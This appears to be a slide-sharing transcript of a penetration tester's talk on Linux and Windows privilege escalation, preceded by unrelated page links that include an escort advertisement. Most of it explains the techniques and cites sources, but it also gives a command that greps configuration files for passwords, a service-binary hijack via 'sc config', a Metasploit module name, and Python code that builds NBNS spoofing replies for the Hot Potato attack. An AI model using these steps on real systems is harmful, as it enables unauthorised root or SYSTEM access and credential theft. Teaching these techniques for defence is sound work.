Emergent Methods: Multi-lingual narrative tracking in the news - real-time ex...
Emergent Methods: Multi-lingual narrative tracking in the news - real-time ex...Emergent Methods: Multi-lingual narrative tracking in the news - real-time ex...
Emergent Methods: Multi-lingual narrative tracking in the news - real-time ex...
 
Navi Mumbai Call Girls 🥰 8617370543 Service Offer VIP Hot Model
Navi Mumbai Call Girls 🥰 8617370543 Service Offer VIP Hot ModelNavi Mumbai Call Girls 🥰 8617370543 Service Offer VIP Hot Model
Navi Mumbai Call Girls 🥰 8617370543 Service Offer VIP Hot Model
 
Manulife - Insurer Transformation Award 2024
Manulife - Insurer Transformation Award 2024Manulife - Insurer Transformation Award 2024
Manulife - Insurer Transformation Award 2024
 
Cloud Frontiers: A Deep Dive into Serverless Spatial Data and FME
Cloud Frontiers:  A Deep Dive into Serverless Spatial Data and FMECloud Frontiers:  A Deep Dive into Serverless Spatial Data and FME
Cloud Frontiers: A Deep Dive into Serverless Spatial Data and FME
 
Apidays Singapore 2024 - Scalable LLM APIs for AI and Generative AI Applicati...
Apidays Singapore 2024 - Scalable LLM APIs for AI and Generative AI Applicati...Apidays Singapore 2024 - Scalable LLM APIs for AI and Generative AI Applicati...
Apidays Singapore 2024 - Scalable LLM APIs for AI and Generative AI Applicati...
 

1000 to 0

  • 2. Who am I •Pen tester from Singapore •Started learning about security since 15 and still learning •Want to learn: Reverse Engineering, Kernel Debugging & Exploit 2
  • 3. What I am not talking about •How to use Kernel exploit 3
  • 4. What I am talking •How to find typical misconfigurations made by Sysadmins and Developers •How to capitalize on the misconfigurations to gain super user privileges 4
  • 5. Why am I talking about this? •Running limited shell is not fun •Running kernel exploit is a high risk activity •Kernel exploits are rare •Kernel vulnerabilities usually get patched very quickly 5
  • 7. SUID/SGID •Set User ID Bit / Set Group ID Bit •Enable users to execute file with file owner/group’s permission •Improve security by not assigning permissions for sensitive files to every user -rwsr-xr-x 1 root root 48920 Nov 13 00:58 /usr/bin/passwd 7
  • 8. SUID/SGID What if Buffer Overflow Exists? Command Injection Exists? Interactive Shell Exists? 8
  • 11. SUID/SGID Find all SUID/SGID files find / -perm /u=s,g=s -type f -exec ls -la {} + 2> /dev/null 11
  • 12. sudo •Enable users to run command with privilege of another user •Commonly found in scripts to run privileged commands without password authentication 12
  • 15. sudo 15 VMware vRealize Appliance Source: http://www.shellntel.com/blog/2016/6/7/weaponizing-nessus
  • 16. sudo 16 VMWare vRealize Appliance Source: http://www.shellntel.com/blog/2016/6/7/weaponizing-nessus
  • 17. Weak Folder/File Permission •Reveal sensitive information in history or configuration files •Enable modification of important files or scripts executed by Init or Cron job 17
  • 18. Weak Folder/File Permission •Look out for • Home Directory (.rhosts, .ssh/authorized_keys, .bashrc, .*_history) • Config files (httpd.conf, my.cnf, config.inc.php, sshd.config) • Source codes (.php, .c, .cpp, .pl, .py) • Init (/etc/rc.*) and Cron job (/etc/cron.*/, /var/spool/cron/) • Scripts executed by Init or Cron job 18
  • 20. Weak Folder/File Permission World Readable Files/Folders find / -perm /o+r -exec ls -la {} + 2>/dev/null World Writeable Files/Folder find / -perm /o+w -exec ls -la {} + 2>/dev/null Search for ‘password’ in conf files find / -name *.conf -type f -exec grep -Hn password {} + 2>/dev/null 20
  • 21. PATH •Environment variable for Shell to search for executable •Meant for convenience however could be abused for Relative Path commands 21
  • 22. PATH Assume this is a complex app that allows an authenticated user to view log SUID Enabled 22
  • 25. Symbolic Link Attack •Symbolic link a.k.a soft link points to another file by filename •Able to link any files regardless of the existence of target file •Race Condition •User with write access 25
  • 26. Symbolic Link Attack Cron Job runs this Program to ensure foo is always Writable 26
  • 27. Symbolic Link Attack User has write access for /tmp to create symlink foo User has NO write access to /etc/cron.d/john YET 27
  • 28. Symbolic Link Attack After Cron Job executed the Program User has write access to /etc/cron.d/john 28
  • 29. Symbolic Link Attack Source: https://packetstormsecurity.com/files/133692/Ubuntu-Security-Notice-USN-2744-1.html 29
  • 30. Linux Enumeration Scripts •LinEnum - http://www.rebootuser.com/?p=1758 •LinuxPrivChecker - www.securitysift.com/download/linuxprivchecker.py 30
  • 33. Weak Folder/File Permission The vulnerability is due to incorrect installation and permissions settings on binary files during the MSE physical or virtual appliance install procedure. An attacker could exploit this vulnerability by logging into the device and escalating their privileges. A successful exploit could allow the attacker to acquire root-level privileges and take full control of the device. Source: https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20151104-privmse 33
• 34. Weak Folder/File Permission
Get the list of services whose binary is not under System32:
    for /f "tokens=2 delims='='" %a in ('wmic service list full^|find /i "pathname"^|find /i /v "system32"') do @echo %a >> services.txt
Get the permissions on each of those binaries:
    for /f eol^=^"^ delims^=^" %a in (services.txt) do cmd.exe /c icacls "%a" >> permissions.txt
Source: http://travisaltman.com/windows-privilege-escalation-via-weak-service-permissions/
• 35. Weak Service Permission
•Well-known vulnerability class; the classic case is Windows XP SP1 and Windows Server 2003
•MS06-011: the Upnphost, SCardSvr, SSDPSRV, DnsCache and DHCP services had permissive DACLs
Source: http://www.fuzzysecurity.com/tutorials/16.html
• 36. Weak Service Permission
•sc config upnphost binpath= "..."
(the space after "binpath=" is required by sc's syntax; the new binary runs with the service's account when the service is restarted)
Source: http://www.fuzzysecurity.com/tutorials/16.html
• 37. Weak Service Permission
Get permissions on services (accesschk from Sysinternals):
    accesschk.exe -uwcqv "Authenticated Users" *
    accesschk.exe -uwcqv "Users" *
(repeat for "Everyone" and any other group the current user belongs to)
Source: http://www.fuzzysecurity.com/tutorials/16.html
• 38. Weak Registry Permission
•Services registered on the system are stored in the Registry under
  HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services
•A weak permission on a service's key lets a non-privileged user modify the service's configuration (ImagePath, for instance) without touching the service itself
• 39. Unquoted Service Paths
DisplayName                  Name                         PathName
hMailServer                  hMailServer                  C:\Server\Mail Server\hMailServer\Bin\hMailServer.exe RunAsService
Mobile Broadband HL Service  Mobile Broadband HL Service  "C:\ProgramData\MobileBrServ\mbbservice.exe"
VMware Tools                 VMTools                      "C:\Program Files\VMware\VMware Tools\vmtoolsd.exe"
• 40. Unquoted Service Paths
•An unquoted service path containing space(s) is ambiguous: Windows cannot tell where the executable name ends and the arguments begin
•It tries each prefix of the path that ends at a space, in order, until one executes
•Number of attempted executions = number of spaces + 1
• 41. Unquoted Service Paths
C:\Program Files\Service Dir\binary name.exe
1) C:\Program.exe
2) C:\Program Files\Service.exe
3) C:\Program Files\Service Dir\binary.exe
4) C:\Program Files\Service Dir\binary name.exe
• 42. Unquoted Service Paths
•Look out for services installed in C:\*Folder*
•"Authenticated Users" has Modify permission on C:\*Folder*, inherited from the permissions on C:\ (except for folders created by Windows)
• 44. Unquoted Service Paths
From the hMailServer changelog: "The hMailServer service is now registered in Windows with a quoted path, to prevent the service from being vulnerable to "Unquoted service path". Unquoted service paths would allow a user with access to the server where hMailServer runs, but with less privileges than hMailServer, to gain the privileges of hMailServer by creating a new executable and placing it in C:\ProgramFiles\hMailServer\hMailserver.exe."
Not right! The file the attacker plants is the first prefix that ends at a space (C:\Program.exe for a default install, C:\Server\Mail.exe for the install below), not a file inside the install directory, so the attacker only needs write access to that parent directory.
• 45. Unquoted Service Paths
C:\Server\Mail Server\hmailServer\Bin\hMailServer.exe RunAsService
• 46. Unquoted Service Paths
(screenshot) C:\Server\Mail.exe, planted by the attacker, is a reverse shell; the service manager runs it under the service account when the service starts.
• 48. Unquoted Service Paths
Find all unquoted service paths (auto-start, outside C:\Windows, not beginning with a quote):
    wmic service get name,displayname,pathname,startmode |findstr /i "auto" |findstr /i /v "c:\windows" |findstr /i /v """
Quick exploit: use Metasploit - exploit/windows/local/trusted_service_path
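An added example (not the author's tooling) that generalizes the walk-through on slide 41: `hijack_candidates()` computes, for any unquoted service path, the sequence of files Windows will try, and `find_unquoted_services()` applies it to the output of `wmic service get name,displayname,pathname,startmode /format:csv` (the same wmic query as above, with CSV output instead of findstr filtering). The CSV below is constructed from the services on slide 39 plus two made-up rows; it is not captured from a real host.

```python
"""Unquoted service path finder: given `wmic service get ... /format:csv`
output, lists the executables Windows would try before the real one."""
import csv
import io


def hijack_candidates(pathname):
    """Return every file CreateProcess may try for an unquoted PathName, in order.
    The last entry is the legitimate binary; everything before it is plantable."""
    if pathname.startswith('"'):
        return []                          # quoted path: no ambiguity
    tokens = pathname.split(" ")
    candidates = []
    for i in range(1, len(tokens) + 1):
        prefix = " ".join(tokens[:i])
        last_component = prefix.rsplit("\\", 1)[-1]
        # Windows appends .exe only when the name carries no extension at all.
        candidate = prefix if "." in last_component else prefix + ".exe"
        candidates.append(candidate)
        if "." in last_component and candidate.lower().endswith(".exe"):
            break                          # reached the service binary; the rest are arguments
    return candidates


def find_unquoted_services(wmic_csv):
    """Parse wmic CSV output and report auto-start services outside C:\\Windows whose
    unquoted path contains spaces, together with the paths an attacker could plant."""
    # QUOTE_NONE keeps the surrounding quotes of a quoted PathName as literal text.
    reader = csv.DictReader(io.StringIO(wmic_csv.strip()), quoting=csv.QUOTE_NONE)
    findings = []
    for row in reader:
        path = (row.get("PathName") or "").strip()
        if (row.get("StartMode") or "").strip().lower() != "auto":
            continue
        if path.lower().startswith("c:\\windows"):
            continue
        candidates = hijack_candidates(path)
        if len(candidates) > 1:
            findings.append({"Name": row["Name"], "PathName": path,
                             "Plantable": candidates[:-1]})
    return findings


# Constructed sample of `wmic service get name,displayname,pathname,startmode /format:csv`
# (rows for hMailServer, the Huawei service and VMware Tools follow slide 39; the
# ExampleSvc and wuauserv rows are made up for the demo).
SAMPLE_WMIC_CSV = r"""
Node,DisplayName,Name,PathName,StartMode
HOST1,hMailServer,hMailServer,C:\Server\Mail Server\hmailServer\Bin\hMailServer.exe RunAsService,Auto
HOST1,Mobile Broadband HL Service,Mobile Broadband HL Service,"C:\ProgramData\MobileBrServ\mbbservice.exe",Auto
HOST1,VMware Tools,VMTools,"C:\Program Files\VMware\VMware Tools\vmtoolsd.exe",Auto
HOST1,Example Service,ExampleSvc,C:\Program Files\Service Dir\binary name.exe,Auto
HOST1,Windows Update,wuauserv,C:\Windows\system32\svchost.exe -k netsvcs,Manual
"""


if __name__ == "__main__":
    for finding in find_unquoted_services(SAMPLE_WMIC_CSV):
        print(finding["Name"], "->", ", ".join(finding["Plantable"]))
```

On a target, feed it the real wmic output (or `Get-CimInstance Win32_Service` exported to CSV on hosts where wmic has been removed) and then check each plantable path's parent directory with icacls or accesschk, as on slides 34 and 37; a candidate is only useful if the current user can create a file there.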
• 49. DLL Hijacking
•Dynamic Link Libraries (DLL)
•Shared library concept: allows applications to reuse code in a DLL
•Hijacking happens when an application loads an attacker's DLL instead of the intended one
• 50. DLL Hijacking
•Loading a DLL that does not exist on the system (the search falls through every directory in the order below)
•Loading a DLL without a fully qualified path (the search order decides which copy wins)
• 51. DLL Hijacking
•Windows 32-bit DLL search order with SafeDllSearchMode enabled:
1. Directory from which the application is loaded
2. 32-bit system directory (C:\Windows\System32)
3. 16-bit system directory (C:\Windows\System)
4. Windows directory (C:\Windows)
5. Current directory
6. Directories listed in %PATH%
• 52. DLL Hijacking
•CVE-2016-2855: Huawei Mobile Broadband HL Service Local Privilege Escalation
•"The Huawei Mobile Broadband HL Service 22.001.25.00.03 and earlier uses a weak ACL for the MobileBrServ program data directory, which allows local users to gain SYSTEM privileges by modifying VERSION.dll."
• 55. DLL Hijacking
Used ExportsToC++ to generate all export functions from C:\Windows\System32\version.dll (the usual proxy-DLL approach: the planted VERSION.dll forwards every export to the real library so the service keeps working while the attacker's code runs)
• 59. Windows Enumeration Script/Tool
•windows-privesc-check - https://github.com/pentestmonkey/windows-privesc-check
• 60. Hot Potato
•Researched and developed by Stephen Breen @ FoxGlove Security
•Combines three weaknesses to perform privilege escalation:
•NetBIOS Name Service (NBNS) spoofing
•Web Proxy Auto-Discovery Protocol (WPAD) man-in-the-middle attack
•HTTP -> SMB relay
• 61. NBNS Spoofing
•Windows resolves a host name in this order:
• Local hosts file @ C:\Windows\System32\drivers\etc\hosts
• DNS cache
• DNS server
• Local LMHOSTS file @ C:\Windows\System32\drivers\etc\lmhosts.sam
• NetBIOS broadcast (NBNS, UDP/137)
•Anyone on the subnet can answer the NetBIOS broadcast, and the first answer wins ☺
• 62. WPAD Man in the Middle
• WPAD is enabled by default
• IE (and anything using WinHTTP's proxy settings) automatically looks up http://wpad/wpad.dat for proxy settings, so whoever answers the name WPAD chooses the proxy
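An added example (not Hot Potato's code) of the NBNS exchange behind step 1 of the attack: the packet a Windows host broadcasts when it cannot resolve WPAD through DNS, and the positive name-query response a spoofer sends back pointing WPAD at itself. It follows the RFC 1002 layout (first-level name encoding, NB resource record with a 6-byte RDATA of NB_FLAGS plus IPv4 address). The transaction ID, the attacker IP and the names are constructed for the demo; the block only builds and parses the datagrams, it does not put them on the wire.

```python
"""NBNS name-query spoofing: the packets exchanged when a host broadcasts a
query for WPAD and an attacker on the same subnet answers (RFC 1002 format)."""
import socket
import struct

NB_TYPE, IN_CLASS = 0x0020, 0x0001
QUERY_FLAGS = 0x0110       # opcode QUERY, broadcast, recursion desired
RESPONSE_FLAGS = 0x8500    # response, opcode QUERY, authoritative answer, recursion desired


def encode_netbios_name(name, suffix=0x00):
    """First-level encoding: pad to 15 chars, append the suffix byte, split each
    byte into two nibbles and add 'A' (0x41) to each nibble: 32 characters."""
    raw = name.upper().ljust(15).encode("ascii") + bytes([suffix])
    return "".join(chr(0x41 + (b >> 4)) + chr(0x41 + (b & 0x0F)) for b in raw)


def decode_netbios_name(encoded):
    """Reverse of encode_netbios_name(); returns (name, suffix)."""
    raw = bytes(((ord(encoded[i]) - 0x41) << 4) | (ord(encoded[i + 1]) - 0x41)
                for i in range(0, 32, 2))
    return raw[:15].decode("ascii").rstrip(), raw[15]


def _wire_name(name):
    # Length byte (0x20 = 32), the encoded label, then the root label terminator.
    return b"\x20" + encode_netbios_name(name).encode("ascii") + b"\x00"


def build_query(trn_id, name):
    """What the victim broadcasts to UDP/137 when DNS fails to resolve `name`."""
    header = struct.pack("!HHHHHH", trn_id, QUERY_FLAGS, 1, 0, 0, 0)
    return header + _wire_name(name) + struct.pack("!HH", NB_TYPE, IN_CLASS)


def parse_query(data):
    """Extract (transaction id, queried name) from a name-query datagram."""
    trn_id, flags, qdcount = struct.unpack("!HHH", data[:6])
    if flags & 0x8000 or qdcount != 1 or data[12] != 0x20:
        raise ValueError("not an NBNS name query")
    name, _suffix = decode_netbios_name(data[13:45].decode("ascii"))
    return trn_id, name


def build_response(trn_id, name, ip, ttl=300):
    """Spoofer's positive name-query response: `name` is at `ip`, says the attacker."""
    header = struct.pack("!HHHHHH", trn_id, RESPONSE_FLAGS, 0, 1, 0, 0)
    rdata = struct.pack("!H", 0x0000) + socket.inet_aton(ip)   # NB_FLAGS: B-node, unique name
    answer = struct.pack("!HHIH", NB_TYPE, IN_CLASS, ttl, len(rdata)) + rdata
    return header + _wire_name(name) + answer


def parse_response(data):
    """Extract (transaction id, name, ip) from a positive name-query response."""
    trn_id, flags, _qdcount, ancount = struct.unpack("!HHHH", data[:8])
    if not flags & 0x8000 or ancount != 1:
        raise ValueError("not an NBNS name response")
    name, _suffix = decode_netbios_name(data[13:45].decode("ascii"))
    _rr_type, _rr_class, _ttl, _rdlength = struct.unpack("!HHIH", data[46:56])
    ip = socket.inet_ntoa(data[58:62])        # skip the 2-byte NB_FLAGS in RDATA
    return trn_id, name, ip


def spoof(query_bytes, target_name, attacker_ip):
    """Responder logic: answer only queries for the name we want to hijack."""
    trn_id, name = parse_query(query_bytes)
    if name != target_name.upper():
        return None
    return build_response(trn_id, name, attacker_ip)


if __name__ == "__main__":
    query = build_query(0xBEEF, "WPAD")                  # constructed victim query
    reply = spoof(query, "wpad", "192.168.1.66")         # placeholder attacker IP
    print(parse_response(reply))
```

Hot Potato runs this on the victim itself: it answers the host's own WPAD broadcast with 127.0.0.1, which is why the transaction ID matters (Breen's write-up describes flooding every ID so the spoofed reply is accepted before the real one, since a local spoofer cannot see the broadcast's ID in advance).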
• 63. NTLM Authentication
•Challenge-response protocol
•Three message types:
•Negotiate
•Challenge
•Authenticate
• 64. SMB -> SMB Relay
•The 15-year-old SMB relay/reflection attack: the attacker sits in the middle of a client's connection to a legitimate SMB server
(1) Client connects to the attacker (believing it to be the SMB server) and asks for an NTLM challenge
(2) Attacker connects to the client's own SMB service and asks it for an NTLM challenge
(3) Client sends the attacker its challenge (for connection 2)
(4) Attacker sends the client's own challenge back to it as the challenge for connection (1)
(5) Client encrypts that challenge with its credential (password hash) and sends the response to the attacker
(6) Attacker replays the response as its answer on connection (2) and is authenticated to the client as the client's user
• 65. SMB -> SMB Relay
•MS08-068 stops this: the SMB server rejects an authentication response to a challenge it issued itself, so a challenge can no longer be reflected back to the host that generated it (SMB to SMB relay)
•It does not stop the cross-protocol attack, HTTP -> SMB relay ☺
• 66. HTTP -> SMB Relay
•NTLM is part of Integrated Windows Authentication
•IE supports Integrated Windows Authentication (NTLM authentication)
•Automatic logon is enabled by default for the Intranet zone
•localhost is part of the Intranet zone ☺
• 67. Hot Potato (Windows 7)
Steps
1. Start NBNS spoofing for WPAD and start a web server on localhost:80
2. Trigger a Windows Defender update (runs as NT AUTHORITY\SYSTEM)
3. The spoofed WPAD settings redirect the Windows Defender update's HTTP request to http://localhost/GETHASHES
4. http://localhost/GETHASHES demands NTLM authentication; Hot Potato connects to the local SMB service to obtain a challenge and forwards it to the Windows Defender update client
5. The Windows Defender update client sends its NTLM response (as SYSTEM)
6. Hot Potato completes the SMB authentication with that NTLM response ☺
• 69. More stuff
•Pass the Hash
•Mimikatz: scraping cleartext credentials of logged-on users from the memory of the Windows LSASS subsystem
• 70. Summary
•Non-exhaustive list of privilege escalation techniques
•More awareness has to be raised among sysadmins and developers
• 71. Tools
• LinEnum - http://www.rebootuser.com/?p=1758
• LinuxPrivChecker - www.securitysift.com/download/linuxprivchecker.py
• windows-privesc-check - https://github.com/pentestmonkey/windows-privesc-check
• Hot Potato - https://github.com/foxglovesec/Potato
• Mimikatz - https://github.com/gentilkiwi/mimikatz (also available in Metasploit and PowerSploit)
• PowerSploit - https://github.com/PowerShellMafia/PowerSploit
• PowerOPS (run PowerShell commands without powershell.exe) - https://github.com/fdiskyou/PowerOPS
• 72. References
• http://www.vantagepoint.sg/news/48-security-wednesdays-9-local-privilege-escalation-nus-greyhats
• https://blog.g0tmi1k.com/2011/08/basic-linux-privilege-escalation/
• http://www.dankalia.com/tutor/01005/0100501004.htm
• http://netsec.ws/?p=309
• http://www.fuzzysecurity.com/tutorials/16.html
• https://labs.mwrinfosecurity.com/system/assets/760/original/Windows_Services_-_All_roads_lead_to_SYSTEM.pdf
• http://toshellandback.com/2015/11/24/ms-priv-esc/
• https://foxglovesecurity.com/2016/01/16/hot-potato/
• https://squirtle.googlecode.com/files/NTLM%20is%20Dead%20-%20DefCon%2016.pdf